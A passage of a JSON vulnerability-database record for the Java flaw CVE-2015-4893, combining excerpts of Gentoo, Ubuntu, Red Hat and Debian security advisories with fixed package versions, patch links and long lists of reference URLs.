http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4882\n[ 69 ] CVE-2015-4883\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4883\n[ 70 ] CVE-2015-4883\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4883\n[ 71 ] CVE-2015-4893\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4893\n[ 72 ] CVE-2015-4893\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4893\n[ 73 ] CVE-2015-4901\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4901\n[ 74 ] CVE-2015-4901\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4901\n[ 75 ] CVE-2015-4902\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4902\n[ 76 ] CVE-2015-4902\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4902\n[ 77 ] CVE-2015-4903\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4903\n[ 78 ] CVE-2015-4903\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4903\n[ 79 ] CVE-2015-4906\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4906\n[ 80 ] CVE-2015-4906\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4906\n[ 81 ] CVE-2015-4908\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4908\n[ 82 ] CVE-2015-4908\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4908\n[ 83 ] CVE-2015-4911\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4911\n[ 84 ] CVE-2015-4911\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4911\n[ 85 ] CVE-2015-4916\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4916\n[ 86 ] CVE-2015-4916\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4916\n[ 87 ] CVE-2015-7840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7840\n[ 88 ] CVE-2015-7840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7840\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201603-11\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. Content-Disposition: inline\n\n==========================================================================Ubuntu Security Notice USN-2827-1\nDecember 03, 2015\n\nopenjdk-6 vulnerabilities\n==========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenJDK 6. \n\nSoftware Description:\n- openjdk-6: Open Source Java implementation\n\nDetails:\n\nMultiple vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure, data integrity and availability. An attacker\ncould exploit these to cause a denial of service or expose sensitive\ndata over the network. (CVE-2015-4805, CVE-2015-4835, CVE-2015-4843,\nCVE-2015-4844, CVE-2015-4860, CVE-2015-4881, CVE-2015-4883)\n\nA vulnerability was discovered in the OpenJDK JRE related to\ninformation disclosure and data integrity. An attacker could exploit\nthis to expose sensitive data over the network. (CVE-2015-4806)\n\nA vulnerability was discovered in the OpenJDK JRE related to data\nintegrity. An attacker could exploit this expose sensitive data over\nthe network. (CVE-2015-4872)\n\nMultiple vulnerabilities were discovered in the OpenJDK JRE related\nto information disclosure. An attacker could exploit these to expose\nsensitive data over the network. (CVE-2015-4734, CVE-2015-4842,\nCVE-2015-4903)\n\nMultiple vulnerabilities were discovered in the OpenJDK JRE related\nto availability. (CVE-2015-4803, CVE-2015-4893, CVE-2015-4911)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n icedtea-6-jre-cacao 6b37-1.13.9-1ubuntu0.12.04.1\n icedtea-6-jre-jamvm 6b37-1.13.9-1ubuntu0.12.04.1\n openjdk-6-jre 6b37-1.13.9-1ubuntu0.12.04.1\n openjdk-6-jre-headless 6b37-1.13.9-1ubuntu0.12.04.1\n openjdk-6-jre-lib 6b37-1.13.9-1ubuntu0.12.04.1\n openjdk-6-jre-zero 6b37-1.13.9-1ubuntu0.12.04.1\n\nThis update uses a new upstream release, which includes additional\nbug fixes. 6) - i386, x86_64\n\n3. Further information\nabout these flaws can be found on the IBM Java Security alerts page, listed\nin the References section. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWUw7xXlSAg2UNWIIRAvfBAJ9sZ6SOY/wDqcbrO1vKXXL/EkC7JwCgsgGr\ngRqvLgc6fmY6yFpHYhxEqsE=\n=PM0f\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 7u85-2.6.1-6~deb7u1. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 7u85-2.6.1-5~deb8u1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 7u85-2.6.1-5", "sources": [ { "db": "NVD", "id": "CVE-2015-4893" }, { "db": "JVNDB", "id": "JVNDB-2015-005479" }, { "db": "BID", "id": "77207" }, { "db": "VULMON", "id": "CVE-2015-4893" }, { "db": "PACKETSTORM", "id": "134424" }, { "db": "PACKETSTORM", "id": "136182" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "134501" }, { "db": "PACKETSTORM", "id": "134620" }, { "db": "PACKETSTORM", "id": "134048" }, { "db": "PACKETSTORM", "id": "134499" }, { "db": "PACKETSTORM", "id": "134110" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-4893", "trust": 3.0 }, { "db": "BID", "id": "77207", "trust": 1.4 }, { "db": "MCAFEE", "id": "SB10141", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033884", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2015-005479", "trust": 0.8 }, { "db": "HITACHI", "id": "HS15-027", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2015-4893", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134424", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136182", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137932", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134501", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134620", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134048", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134499", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134110", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-4893" }, { "db": "BID", "id": "77207" }, { "db": "JVNDB", "id": "JVNDB-2015-005479" }, { "db": "PACKETSTORM", "id": "134424" }, { "db": "PACKETSTORM", "id": "136182" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "134501" }, { "db": "PACKETSTORM", "id": "134620" }, { "db": "PACKETSTORM", "id": "134048" }, { "db": "PACKETSTORM", "id": "134499" }, { "db": "PACKETSTORM", "id": "134110" }, { "db": "NVD", "id": "CVE-2015-4893" } ] }, "id": "VAR-201510-0529", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.3152174 }, "last_update_date": "2024-07-22T21:43:49.129000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "HS15-027", "trust": 1.6, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs15-027/index.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015verbose-2367954.html" }, { "title": "October 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2015_critical_patch_update" }, { "title": "Oracle Corporation Java\u30d7\u30e9\u30b0\u30a4\u30f3\u306e\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b\u304a\u77e5\u3089\u305b", "trust": 0.8, "url": "http://www.fmworld.net/biz/common/oracle/20151021.html" }, { "title": "Red Hat: CVE-2015-4893", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-4893" }, { "title": "Red Hat: Critical: java-1.7.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152507 - security advisory" }, { "title": "Red Hat: Critical: java-1.6.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152508 - security advisory" }, { "title": "Red Hat: Critical: java-1.8.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152509 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.1-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152506 - security advisory" }, { "title": "Ubuntu Security Notice: openjdk-6 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2827-1" }, { "title": "Ubuntu Security Notice: openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2784-1" }, { "title": "Amazon Linux AMI: ALAS-2015-616", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-616" }, { "title": "Amazon Linux AMI: ALAS-2015-605", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-605" }, { "title": "Amazon Linux AMI: ALAS-2015-606", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-606" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-4893" }, { "db": "JVNDB", "id": "JVNDB-2015-005479" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2015-4893" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2015-2507.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2015-2506.html" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2016:1430" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/77207" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201603-11" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-2827-1" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-2508.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-1927.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "trust": 1.1, "url": "https://security.gentoo.org/glsa/201603-14" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-11/msg00009.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00001.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00003.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-11/msg00000.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10141" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-11/msg00010.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00000.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-11/msg00008.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-11/msg00001.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00004.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00006.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-2509.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-11/msg00019.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00045.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00005.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00014.html" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2784-1" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033884" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3381" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1928.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1926.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1921.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1920.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1919.html" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-4893" }, { "trust": 0.8, "url": "https://www.ipa.go.jp/security/ciadr/vul/20151021-jre.html" }, { "trust": 0.8, "url": "http://www.jpcert.or.jp/at/2015/at150038.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-4893" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4883" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4882" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4903" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4872" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4806" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4860" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4805" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4893" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4842" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4843" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4835" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4803" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4734" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4844" }, { "trust": 0.6, "url": "https://access.redhat.com/security/cve/cve-2015-4893" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-4844" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-4860" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-4803" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-4734" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-4842" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-4843" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-4835" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-4903" }, { "trust": 0.5, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-4883" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.5, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-4805" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-4882" }, { "trust": 0.5, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-4872" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2015-4806" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4881" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4911" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4840" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4871" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4902" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2015-4902" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/java/index.html" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/java_oct2015_advisory.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024350" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs15-027/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021090" }, { "trust": 0.3, "url": "https://kb.netapp.com/support/index?page=content\u0026id=9010044\u0026actp=rss" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21979528" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976573" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21979761" }, { "trust": 0.3, "url": "https://support.f5.com/kb/en-us/solutions/public/k/14/sol14132811.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005743" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21969225" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21969428" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21970978" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21971058" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21971322" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21971876" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21972382" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21972432" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21972468" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21972469" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21972578" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21972921" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21973066" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21973135" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21973139" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21973723" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21973724" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974149" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974673" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974831" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21981349" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21981540" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-4871" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-4840" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4810" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-4810" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2015-5006" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5006" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-4911" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-4881" }, { "trust": 0.2, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2827-1/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2015-2086.html" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4734" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2621" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2627" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0492" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0458" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2659" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4911" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4732" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4906" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4882" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4908" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2664" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0488" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4868" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4902" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0484" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4835" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0488" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4903" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2619" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2637" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4844" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4736" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4842" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0480" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2659" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4760" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4810" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2601" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0437" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0469" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0480" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0437" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2627" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4893" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2590" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0478" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2638" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4916" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0459" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2613" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2601" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2628" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2619" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0478" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2628" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0486" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4000" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2638" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4733" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2632" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0492" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4805" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2621" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4748" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7840" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2590" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4901" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4881" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4806" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4000" }, { "trust": 0.1, "url": 